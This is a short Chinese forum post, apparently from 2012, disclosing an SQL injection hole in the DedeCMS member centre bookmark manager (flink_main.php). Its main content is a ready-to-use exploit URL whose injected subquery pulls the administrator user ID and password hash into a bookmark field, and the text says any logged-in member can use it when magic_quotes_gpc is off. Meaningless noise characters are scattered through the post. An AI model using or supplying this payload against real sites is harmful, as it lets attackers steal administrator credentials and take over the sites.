DedeCMS会员中心SQL注射漏洞
6 r8 k7 a- |5 H- V& S0 E2 L需要magic_quotes_gpc = Off4 E' W6 m d) R6 Z- }
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
^1 ]$ r y+ Q% l4 m6 F ) w; ~# E* J7 D7 J
DedeCMS会员中心书签管理SQL注射漏洞 w& U2 e8 D% ~/ v
成功利用该漏洞可获得管理员密码
. {# f$ Y0 q0 t
3 r% M: t: V7 L: H# a9 m# Q' V会员登录后可以执行SQL语句查询数据库任意内容如管理员密码1 E L% M& r. C1 r) X+ h0 ]
6 ^ g0 Z# ~1 v' `
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r8 N; S+ e9 M; D; v1 z3 Y
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59